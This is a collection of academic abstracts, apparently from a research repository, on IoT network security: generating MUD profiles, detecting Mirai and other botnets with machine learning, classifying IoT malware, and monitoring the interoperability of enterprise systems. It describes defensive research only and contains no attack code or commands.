Verifying and Monitoring IoTs Network Behavior using MUD Profiles

IoT devices are increasingly being implicated in cyber-attacks, raising community concern about the risks they pose to critical infrastructure, corporations, and citizens. In order to reduce this risk, the IETF is pushing IoT vendors to develop formal specifications of the intended purpose of their IoT devices, in the form of a Manufacturer Usage Description (MUD), so that their network behavior in any operating environment can be locked down and verified rigorously. This paper aims to assist IoT manufacturers in developing and verifying MUD profiles, while also helping adopters of these devices to ensure they are compatible with their organizational policies and track devices network behavior based on their MUD profile. Our first contribution is to develop a tool that takes the traffic trace of an arbitrary IoT device as input and automatically generates the MUD profile for it. We contribute our tool as open source, apply it to 28 consumer IoT devices, and highlight insights and challenges encountered in the process. Our second contribution is to apply a formal semantic framework that not only validates a given MUD profile for consistency, but also checks its compatibility with a given organizational policy. We apply our framework to representative organizations and selected devices, to demonstrate how MUD can reduce the effort needed for IoT acceptance testing. Finally, we show how operators can dynamically identify IoT devices using known MUD profiles and monitor their behavioral changes on their network.Comment: 17 pages, 17 figures. arXiv admin note: text overlap with arXiv:1804.0435

Étude des sous-graphes communs des Graphes de Dépendance d’Appels Systèmes pour la classification de logiciels malveillants

International audienceDistinguishing legitimate software from malicious software is a problem that requires a lot of expertise. In order to create a malware detection software, an approach consists in extracting System Call Dependency Graphs (SCDG) which summarize the behavior of a software. Once SCDGs are extracted, a learning phase identifies sub-graphs characteristic of malicious behaviors. In order to classify the graph of an unknown binary, we look whether it contains such sub-graphs. These techniques proved to be efficient, but no analysis of the sub-graphs extracted during the learning phase has been conducted so far. We study the sub-graphs we find and showcase preprocessing steps on the graphs in order to improve the learning and classification performance. The approach has been applied on graphs extracted from Mirai. Mirai is a malware which created a large botnet in 2016 to perform distributed deny of service attacks. We show that the preprocessing step tremendously improve the speed of the learning and classification

Monitoring morphisms to support sustainable interoperability of enterprise systems

Dissertation to obtain the Master degree in Electrical Engineering and Computer ScienceNowadays, organizations are required to be part of a global collaborative world. Sometimes this is the only way they can access new and wider markets, reaching new opportunities, skills and sharing assets, e.g. tools, lessons learnt. However, due to the different sources of enterprise models and semantics, organizations are experiencing difficulties in exchanging vital information via electronic and in a seamlessly way. To solve this issue, most of them try to attain interoperability by establishing peer-to-peer mappings with different business partners, or in optimized networks using neutral data standards to regulate communications. Moreover, the systems are more and more dynamic, changing frequently to answer new customer’s requirements, causing new interoperability problems and a reduction of efficiency. This dissertation proposes a multi-agent system to monitor existing enterprise systems, by being capable of detecting morphism changes. With this, network harmonization breakings are timely detected, and possible solutions are suggested to regain the interoperable status, thus enhancing robustness for reaching sustainability of business networks

Exploring the use of conversational agents to improve cyber situational awareness in the Internet of Things (IoT).

The Internet of Things (IoT) is an emerging paradigm, which aims to extend the power of the Internet beyond computers and smartphones to a vast and growing range of "things" - devices, processes and environments. The result is an interconnected world where humans and devices interact with each other, establishing a smart environment for the continuous exchange of information and services. Billions of everyday devices such as home appliances, surveillance cameras, wearables and doorbells, enriched with computational and networking capabilities, have already been connected to the Internet. However, as the IoT has grown, the demand for low-cost, easy-to-deploy devices has also increased, leading to the production of millions of insecure Internet-connected smart devices. Many of these devices can be easily exploited and leveraged to perform large-scale attacks on the Internet, such as the recently witnessed botnet attacks. Since these attacks often target consumer-level products, which commonly lack a screen or user interface, it can be difficult for users to identify signs of infection and be aware of devices that have been compromised. This thesis presents four studies which collectively explored how user awareness of threats in consumer IoT networks could be improved. Maintaining situational awareness of what is happening within a home network is challenging, not least because malicious activity often occurs in devices which are not easily monitored. This thesis evaluated the effectiveness of conversational agents to improve Cyber Situational Awareness. In doing so, it presented the first study to investigate their ability to help users improve their perception of smart device activity, comprehend this in the context of their home environment, and project this knowledge to determine if a threat had occurred or may occur in the future. The research demonstrated how a BLSTMRNN with word embedding could be used to extract semantic meaning from packets to perform deep packet inspection and detect IoT botnet activity. Specifically, how the models use of contextual information from both the past and future enabled better predictions to be made about the current state (packet) due to the sequential nature of the network traffic. In addition, a cross-sectional study examined users' awareness and perception of threats and found that, although users value security and privacy, they found it difficult to identify threats and infected devices. Finally, novel cross-sectional and longitudinal studies evaluated the use of conversational agents, and demonstrated them to be an effective and efficient method of improving Cyber Situational Awareness. In particular, this was shown to be true when using a multi-modal approach and combining aural, verbal and visual modalities

Multilayer framework for botnet detection using machine learning algorithms

The authors wish to thank Universiti Teknologi Malaysia (UTM) for its support under Research University Grant Vot- 20H04, Malaysia Research University Network (MRUN) Vot 4L876. The authors would like to acknowledge that this work was supported/funded by the Ministry of Higher Education under the Fundamental Research Grant Scheme (FRGS/1/2018/ICT04/UTM/01/1). The work was also partially supported by the Specific Research project (SPEV) at the Faculty of Informatics and Management, University of Hradec Kralove, Czech Republic, under Grant 2102-2021. The authors are grateful for the support of student Sebastien Mambou in consultations regarding application aspects. The authors also wish to thank the Ministry of Education Malaysia for the Hadiah Latihan Persekutuan (HLP) scholarship to complete the research.A botnet is a malware program that a hacker remotely controls called a botmaster. Botnet can perform massive cyber-attacks such as DDOS, SPAM, click-fraud, information, and identity stealing. The botnet also can avoid being detected by a security system. The traditional method of detecting botnets commonly used signature-based analysis unable to detect unseen botnets. The behavior-based analysis seems like a promising solution to the current trends of botnets that keep evolving. This paper proposes a multilayer framework for botnet detection using machine learning algorithms that consist of a ltering module and classi cation module to detect the botnet's command and control server. We highlighted several criteria for our framework, such as it must be structure-independent, protocol-independent, and able to detect botnet in encapsulated technique. We used behavior-based analysis through ow-based features that analyzed the packet header by aggregating it to a 1-s time. This type of analysis enables detection if the packet is encapsulated, such as using a VPN tunnel. We also extend the experiment using different time intervals, but a 1-s time interval shows the most impressive results. The result shows that our botnet detection method can detect up to 92% of the f-score, and the lowest false-negative rate was 1.5%.Universiti Teknologi Malaysia (UTM) through the Research University Vot-20H04Malaysia Research University Network (MRUN) Vot4L876Ministry of Higher Education through the Fundamental Research Grant Scheme FRGS/1/2018/ICT04/UTM/01/1Hadiah Latihan Persekutuan (HLP) Scholarship through the Ministry of Education MalaysiaSpecific Research Project (SPEV) by the Faculty of Informatics and Management, University of Hradec Kralove, Czech Republi

On Leveraging Next-Generation Deep Learning Techniques for IoT Malware Classification, Family Attribution and Lineage Analysis

Recent years have witnessed the emergence of new and more sophisticated malware targeting insecure Internet of Things (IoT) devices, as part of orchestrated large-scale botnets. Moreover, the public release of the source code of popular malware families such as Mirai [1] has spawned diverse variants, making it harder to disambiguate their ownership, lineage, and correct label. Such a rapidly evolving landscape makes it also harder to deploy and generalize effective learning models against retired, updated, and/or new threat campaigns. To mitigate such threat, there is an utmost need for effective IoT malware detection, classification and family attribution, which provide essential steps towards initiating attack mitigation/prevention countermeasures, as well as understanding the evolutionary trajectories and tangled relationships of IoT malware. This is particularly challenging due to the lack of fine-grained empirical data about IoT malware, the diverse architectures of IoT-targeted devices, and the massive code reuse between IoT malware families. To address these challenges, in this thesis, we leverage the general lack of obfuscation in IoT malware to extract and combine static features from multi-modal views of the executable binaries (e.g., images, strings, assembly instructions), along with Deep Learning (DL) architectures for effective IoT malware classification and family attribution. Additionally, we aim to address concept drift and the limitations of inter-family classification due to the evolutionary nature of IoT malware, by detecting in-class evolving IoT malware variants and interpreting the meaning behind their mutations. To this end, we perform the following to achieve our objectives: First, we analyze 70,000 IoT malware samples collected by a specialized IoT honeypot and popular malware repositories in the past 3 years. Consequently, we utilize features extracted from strings- and image-based representations of IoT malware to implement a multi-level DL architecture that fuses the learned features from each sub-component (i.e, images, strings) through a neural network classifier. Our in-depth experiments with four prominent IoT malware families highlight the significant accuracy of the proposed approach (99.78%), which outperforms conventional single-level classifiers, by relying on different representations of the target IoT malware binaries that do not require expensive feature extraction. Additionally, we utilize our IoT-tailored approach for labeling unknown malware samples, while identifying new malware strains. Second, we seek to identify when the classifier shows signs of aging, by which it fails to effectively recognize new variants and adapt to potential changes in the data. Thus, we introduce a robust and effective method that uses contrastive learning and attentive Transformer models to learn and compare semantically meaningful representations of IoT malware binaries and codes without the need for expensive target labels. We find that the evolution of IoT binaries can be used as an augmentation strategy to learn effective representations to contrast (dis)similar variant pairs. We discuss the impact and findings of our analysis and present several evaluation studies to highlight the tangled relationships of IoT malware, as well as the efficiency of our contrastively learned fine-grained feature vectors in preserving semantics and reducing out-of-vocabulary size in cross-architecture IoT malware binaries. We conclude this thesis by summarizing our findings and discussing research gaps that lay the way for future work

Monitoring and Information Alignment in Pursuit of an IoT-Enabled Self-Sustainable Interoperability

To remain competitive with big corporations, small and medium-sized enterprises (SMEs) often need to be more dynamic, adapt to new business situations, react faster, and thereby survive in today‘s global economy. To do so, SMEs normally seek to create consortiums, thus gaining access to new and more opportunities. However, this strategy may also lead to complications. Due to the different sources of enterprise models and semantics, organizations are experiencing difficulties in seamlessly exchanging vital information via electronic means. In their attempt to address this issue, most seek to achieve interoperability by establishing peer-to-peer mappings with different business partners, or by using neutral data standards to regulate communications in optimized networks. Moreover, systems are more and more dynamic, frequently changing to answer new customer‘s requirements, causing new interoperability problems and a reduction of efficiency. Another situation that is constantly changing is the devices used in the enterprises, as the Enterprise Information Systems, devices are used to register internal data, and to be used to monitor several aspects. These devices are constantly changing, following the evolution and growth of the market. So, it is important to monitor these devices and doing a model representation of them. This dissertation proposes a self-sustainable interoperable framework to monitor existing enterprise information systems and their devices, monitor the device/enterprise network for changes and automatically detecting model changes. With this, network harmonization disruptions are detected in a timely way, and possible solutions are suggested to regain the interoperable status, thus enhancing robustness for reaching sustainability of business networks along time

DIMI: Detecção Inteligente de Botnets Mirai em Redes IoT

The emerging usage of Internet of Things (IoT) paradigm brings,together with new services, new threats to Information Security.Among these threats, we have the Mirai Botnet that performed severalDistributed Denial of Service (DDoS) cyberattacks, exploringthe vulnerabilites of IoT devices. Within this context, this paperpresents a mechanism for detecting Mirai botnet attacks on IoTnetworks using ML techniques and comparing different approaches.The mechanism was evaluated using a set of traffic data from realIoT devices, achieving results with 99 % precision in detecting MiraiBotnet attacks

Machine Learning in IoT Security:Current Solutions and Future Challenges

The future Internet of Things (IoT) will have a deep economical, commercial and social impact on our lives. The participating nodes in IoT networks are usually resource-constrained, which makes them luring targets for cyber attacks. In this regard, extensive efforts have been made to address the security and privacy issues in IoT networks primarily through traditional cryptographic approaches. However, the unique characteristics of IoT nodes render the existing solutions insufficient to encompass the entire security spectrum of the IoT networks. This is, at least in part, because of the resource constraints, heterogeneity, massive real-time data generated by the IoT devices, and the extensively dynamic behavior of the networks. Therefore, Machine Learning (ML) and Deep Learning (DL) techniques, which are able to provide embedded intelligence in the IoT devices and networks, are leveraged to cope with different security problems. In this paper, we systematically review the security requirements, attack vectors, and the current security solutions for the IoT networks. We then shed light on the gaps in these security solutions that call for ML and DL approaches. We also discuss in detail the existing ML and DL solutions for addressing different security problems in IoT networks. At last, based on the detailed investigation of the existing solutions in the literature, we discuss the future research directions for ML- and DL-based IoT security